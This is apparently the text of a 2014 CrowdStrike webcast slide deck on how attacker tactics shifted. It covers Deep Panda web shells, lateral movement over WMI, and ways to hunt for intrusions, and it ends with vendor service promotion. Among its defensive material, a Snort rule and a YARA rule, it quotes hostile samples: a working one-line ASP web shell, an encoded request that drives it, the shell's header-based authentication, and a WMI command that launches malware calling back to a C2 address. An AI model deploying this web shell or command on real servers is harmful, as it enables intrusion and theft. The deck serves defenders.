  • 12. Shift in Attacker TTPs 2014 CrowdStrike, Inc. All rights reserved. 12 Attacker TTP Historical Trends Current Trends Initial Attack Vector Spearphish and Vulnerable External Facing Applications (Most Common) No Significant Change Malware – Persistence Mechanism Installed as Service, Run Key, Etc. No Persistence Malware – Command & Control Beacon to Malicious IP or Domain No Standard Beacon Activity Malware – Functionality Simple – Provides Shell or Basic Upload/Download Functionality Robust – Includes All Required Functionality and Commands Malware – Location Written to Disk Memory-Resident
  • 13. Shift in Attacker TTPs (Cont.) 2014 CrowdStrike, Inc. All rights reserved. 13 Attacker TTP Historical Trends Current Trends Lateral Movement Net Use, RDP or Utilities (e.g. PSExec) WMI, Service Accounts Obfuscation Timestomp Standard Times (Windows API) Timestomp Both Standard and File Times (Windows API and MFT) Data Extraction Compress Data and Send to Compromised Host Provider No Significant Change Last Hop Communication Source Country IPs (Most Often Chinese, Russian, Iranian) North American IPs, Anonymous VPN Solutions, Cloud
  • 14. Catalyst for Change 2014 CrowdStrike, Inc. All rights reserved. 14 • Shifts in Tactics – Increased Intel Sharing •  Whitepapers •  Blog Posts •  Conference Demos •  VirusTotal •  US Government JIB (Joint Indicator Bulletin) Pros Cons •  Increased awareness / detection for public companies •  Decreased Intel gap for smaller organizations •  Increased costs for attackers to change TTPs •  Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure) •  Attacks become more advanced to avoid current methods of detection •  Reduces visibility into what attacker is doing and/ or targeting
  • 15. 15 CASE STUDIES 2014 Crowdstrike, Inc. All rights reserved.
  • 16. Case Studies - Background • Company #1 – Company compromised in 2012 using historical TTPs – Partial Remediation February 2013 – Re-Compromise March 2013 with new TTPs • Company #2 – Compromised March 2013 – New TTPs from Company 1 re-compromise were observed © 2014 CrowdStrike, Inc. All rights reserved. 16
  • 17. Timeline © 2014 CrowdStrike, Inc. All rights reserved. 17 @CROWDSTRIKE | #CROWDCASTS February 2013 March 2013 April 2013 Company #1 Investigation Commences Traditional Tactics Intel Community Shares TTPs Shared Widely Company #1 Partial Remediation Logging & Monitoring Old Tactics Company #2 Investigation Commences New Tactics Company #1 Re-compromised New Tactics
  • 18. 18 NEW TACTICS EXPLAINED 2014 Crowdstrike, Inc. All rights reserved.
  • 19. Deep Panda – Simple Web Shell • 28 byte web shell •  Active Server Page file –  Expected input is VBScript code (encoded as ASCII hex) •  The execute() function executes any VBScript passed to it –  Upload / download files –  Execute arbitrary commands (including WMI) –  Full access to file system •  Controlled by an attacker “thick client” 2014 Crowdstrike, Inc. All rights reserved. 19 <%execute request(chr(42))%>
  • 20. Deep Panda – Simple Web Shell 2014 Crowdstrike, Inc. All rights reserved. 20 As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“<h1>Hello World</h1>”) and would render “Hello World” to be printed in the web browser:  http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%6 9%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31 %3E%22%29
  • 21. Deep Panda – Complex Web Shell © 2014 CrowdStrike, Inc. All rights reserved. 21 •  Ability to impersonate a user (with valid credentials) •  Eight different commands –  File system, SQL server, and Active Directory requests –  Upload / download files –  Compile and execute any C# code
  • 22. Web Shell Authentication • Rudimentary (but effective) authentication for incoming connections – Requires the presence of a cookie named ‘zWiz’ – or HTTP header Keep-Alive = 320 – or language header containing es- DN (invalid language) • Prevents identification via search engine indexing or vulnerability scanning 2014 Crowdstrike, Inc. All rights reserved. 22
  • 23. Web Shells – But Why? •  Primary foothold back into victim organization •  Less reliant on malware installed on systems, beaconing to a C2 © 2014 CrowdStrike, Inc. All rights reserved. 23 • Why? –  Low to virtually no detection by antivirus products –  The absence of command and control beacon traffic –  Impossible to block known malicious IP addresses to a web server since adversary can easily change their source IP address –  Cookie and HTTP header authentication aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint
  • 24. Second Stage Malware © 2014 CrowdStrike, Inc. All rights reserved. 24 C2 Infrastructure - Execution using Web Shell -  Lateral Movement -  Data theft Upload MalwareAccess Web Shell Adversary Web ServerAnonymous VPN or Proxy Why? No Command and Control Beacon activity Change IP/Domain on the fly Runs in memory Limits forensic artifacts
  • 25. Lateral Movement © 2014 CrowdStrike, Inc. All rights reserved. 25 Web Server System32cmd.exe - c:bad.exe /f wmi /s Host2 /u Host2Administrator /p ”P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:bad.exe /f sh /s 59.111.22.222 /p 443" Host 2 C2 Infrastructure 59.111.22.222 Anonymous VPN or Proxy Adversary Access Web Shell Leverage WMI Custom VB script “PsExec” Utility 4kb script to remotely launch process as a specified user Cscript.exe – Username Password Remote Host Process path Why WMI? Evades most typical logging Shows up as WMI Service Powerful functionality, built into Windows
  • 26. 26 HUNTING AND DETECTING 2014 Crowdstrike, Inc. All rights reserved.
  • 27. Go Beyond the Indicator • New evil requires new approaches for detection • Look through multiple haystacks for a single needle – The evil stands out with the right methodology • Blog series – Mo’ Shells Mo’ Problems © 2014 CrowdStrike, Inc. All rights reserved. 27 http://www.crowdstrike.com/blog/
  • 28. Hunting – WMI Activity © 2014 CrowdStrike, Inc. All rights reserved. 28 • Windows XP and Server 2003 Had Limited Logging – %systemroot%system32wbemlogs • Windows 7 and Server 2008 Do NOT Log – Help investigators help you – enable ahead of time! •  Wevtutil.exe  sl  Microsoft-­‐Windows-­‐WMI-­‐Activity/Trace  /e:true   – Review WMITracing.log via Event Viewer • Be Familiar with Your Environment’s Use of WMI
  • 29. Hunting Web Shells – Identifying Intrusion Points • Web shells are often one of the earliest stages of malware • Search for activity on the system near the first known compromise time – Successful web scans in logs – SQL injection – Dropper malware – Lateral movement from other compromised systems – Pages created or modified within the webserver document root 2014 Crowdstrike, Inc. All rights reserved. 29 2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
  • 30. Hunting Web Shells – File Stacking • File stacking is based on the concept of least frequency of occurrence • Collect files from all of your webservers and investigate outliers – What files do not exist on other web servers? – PHP|JSP|ASP|ASPX|CFM © 2014 CrowdStrike, Inc. All rights reserved. 30
  • 31. Hunting Web Shells – Web Log Review • Perform statistical analysis of page requests and search for outliers – See exactly when the web shells were in use via the web logs 2014 Crowdstrike, Inc. All rights reserved. 31
  • 32. Hunting Web Shells – Network Monitoring • Stack Web Requests from Network Data • Leverage Cyber Intelligence Feeds to Detect Known Web Shells – Unique header attributes – HTML used to produce the shell © 2014 CrowdStrike, Inc. All rights reserved. 32 alert  tcp  $EXTERNAL_NET  any  -­‐>  $WEB_SERVERS   $HTTP_PORTS  (msg:  "CrowdStrike  Deep  Panda   CSharp  Webshell  Headers";  content:  "Keep-­‐ Alive:  320";  http_raw_header;  content:  "es-­‐ DN";  http_raw_header;  flow:  established,   to_server;  classtype:  trojan-­‐activity;   metadata:  service  http;  sid:  xxx;  rev:  xxx;  )  
  • 33. Hunting – Memory Resident Malware © 2014 CrowdStrike, Inc. All rights reserved. 33 • “Fileless” Forensics Fun • Persistence, We Don’t Need No Stinkin’ Persistence • New Approach to Malware Means New Approach to Forensics • Hidden, Not Invisible • What’s Normal and What’s New? – Get to know your systems – Image memory, review, rinse and repeat
  • 34. Hunting with YARA • YARA signatures can be used to search your enterprise for specific patterns on disk and in memory 2014 Crowdstrike, Inc. All rights reserved. 34 rule CrowdStrike_13091_01 : deep_panda alice RAT { meta: description = "Detection of Mad Hatter .NET RAT" last_modified = "2013-10-08" version = "1.1" in_the_wild = true copyright = "CrowdStrike, Inc" report = "CSIT-13091" strings: $marker1 = "alice'srabbithole" wide $marker2 = "{{"Version":{0},"HostName":"{1}","osVersion": "{2}","tm": "{3}","tz":{4}}}" wide $marker3 = "InstManager.pdb" $marker4 = "<osVersion>" $marker5 = "<tm>" $marker6 = "<tz>" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*) }
  • 35. CrowdResponse • Free CrowdStrike Community Tool • Collect and Analyze Artifacts Across Your Enterprise • Available Modules – DirList – YARA – PSList • Many Modules Coming Soon © 2014 CrowdStrike, Inc. All rights reserved. 35 http://www.crowdstrike.com/community-tools/
  • 36. 36 BEST PRACTICE PREPARATIONS 2014 Crowdstrike, Inc. All rights reserved.
  • 37. Best Practices • Proactive Defense of Your Network – Isolate Critical Assets with Network Segmentation – Consolidate and Monitor Internet Egress Points – Implement Centralized Logging – Patch, Patch, and Patch Again – Secure Web Applications and Internal Software Projects – Minimize or Remove Local Admin Privileges – Implement a Tiered Active Directory Admin Model – Incorporate Cyber Intelligence Feeds 2014 Crowdstrike, Inc. All rights reserved. 37
  • 38. CrowdStrike Can Help! • Services to Consider – Tabletop Assessments (Yearly at Least) •  Keep your team primed and educated on latest attack vectors – Next-Gen Penetration Testing •  More than just a cursory glance, take a real-world scenario approach – Incident Response, Disaster Recovery and Business Continuity Plans •  CrowdStrike knowledge and experience can help you improve/build plans – Incident Response Services Retainer •  Avoid paperwork related time delays • CrowdStrike Intelligence Subscription – Stay Up To Date with Latest Attacker TTPs 2014 CrowdStrike, Inc. All rights reserved. 38
  • 39. 39 CROWDSTRIKE RESOURCES 2014 Crowdstrike, Inc. All rights reserved.
  • 40. CrowdStrike Global Threat Report • Adversary activity analysis and predictions • Look back at 2013 • Predictive trends for 2014 • Threat actor profiles and TTPs • Get it on crowdstrike.com © 2014 CrowdStrike, Inc. All rights reserved. 40
  • 41. INCIDENT RESPONSE SERVICES PROACTIVE RESPONSE SERVICES CROWDSTRIKE SERVICES PROACTIVE RESPONSE SERVICES INCIDENT RESPONSE SERVICES CrowdStrike Services INTELLIGENCETECHNOLOGY 2014 Crowdstrike, Inc. All rights reserved. 41
  • 42. 2014 Crowdstrike, Inc. All rights reserved. 42 PROACTIVE RESPONSE SERVICES PROACTIVE RESPONSE SERVICES Counter Threat Assessment IR Program Development Next-Gen Pen Testing Tabletop Assessment InfoSec Capability Maturing Model Adversary Assessments INCIDENT RESPONSE SERVICES Computer Forensic Analysis Litigation Support Expert Witness Testimony Remediation Malware Analysis
  • 43. Government-quality intelligence developed using an ‘all-source model’ Detailed technical and strategic analysis of 50+ adversaries’ capabilities, indicators and tradecraft, attribution and intentions Customizable feeds and API for indicators of compromise Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution Tailored Intelligence feature provides visibility into breaking events that matter an organization’s brand, infrastructure, and customers Falcon Intelligence: Threat Intelligence Subscription 2 3 4 1 5 2014 Crowdstrike, Inc. All rights reserved. 43
  • 44. Falcon Host: Endpoint Threat Detection & Response Identifies unknown malware & detects zero-day threats Captures and correlates system events to identify adversary activity in real-time Maximum visibility across the full kill chain allows for insight into past & current attacks Context-based detection does not rely on signatures or easily changed IOCs Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack 2 3 4 1 5 2014 Crowdstrike, Inc. All rights reserved. 44
  • 45. Falcon Host: Continuous Endpoint Activity Monitoring Explore rich execution data collected by the Falcon Host sensors Dashboards provide an at-a-glance view of recent activity for investigative purposes Expert-designed menu of queries provide the ability to proactively hunt for malicious activity 2 3 1 2014 Crowdstrike, Inc. All rights reserved. 45
  • 46. © 2014 CrowdStrike, Inc. All rights reserved. 46 Q & A
  • 47. NEXT © 2014 CrowdStrike, Inc. All rights reserved. 47 @CROWDSTRIKE | #CROWDCASTS Topic: Operationalizing Intelligence Adam Meyers – Director, Intelligence Elia Zaitsev – Senior Sales Engineer April 29th | 2PM ET/11AM PT Q&A